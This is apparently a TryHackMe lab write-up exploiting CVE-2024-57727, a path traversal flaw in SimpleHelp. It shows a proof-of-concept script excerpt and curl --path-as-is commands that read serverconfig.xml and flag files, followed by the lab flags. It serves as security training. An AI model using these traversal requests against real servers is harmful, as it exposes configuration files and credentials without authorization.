Try Hack Me/SimpleHelp

Write-up / THM / SimpleHelp: CVE-2024-57727 

by: alfreddgreat

Get the python script for POC for the vulnerability in https://github.com/imjdl/CVE-2024-57727.

root@ip-10-10-65-98:~# git clone https://github.com/imjdl/CVE-2024-57727

Change directory to the downloaded CVE folder.

root@ip-10-10-65-98:~/CVE-2024-57727# cd CVE-2024-57727/

Run the following python script.

root@ip-10-10-65-98:~/CVE-2024-57727# python3 poc.py http://10.10.32.37

Check the poc.py script

def send_path_traversal_request(url: str) -> bool:    """    Send a path traversal request and get the response        Args:        url (str): Target url address    Returns:        dict: Dictionary containing response information, including status code, response content, etc.        None: Returns None if request fails    """    url = url + "/toolbox-resource/../resource1/../../configuration/serverconfig.xml"    context = ssl._create_unverified_context()    # Default request headers    default_headers = {        'Accept-Encoding': 'gzip, deflate, br',        'Accept': '*/*',        'Connection': 'keep-alive'    }

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/serverconfig.xml

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.32.37/toolbox-resource/../resource1/../../configuration/flag.txt

THM{9ND23PVA}

"Choose your path wisely, but your shoes comfortably."

"Traverse lightly, laugh loudly."

THM{9ND23PVA}

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt

root@ip-10-10-65-98:~/CVE-2024-57727# curl --path-as-is http://10.10.189.219/toolbox-resource/../secmsg/../../configuration/flag.txt

THM{X8733EEZ}


"Some paths are meant to be traversed; others just lead to a 404."

THM{X8733EEZ}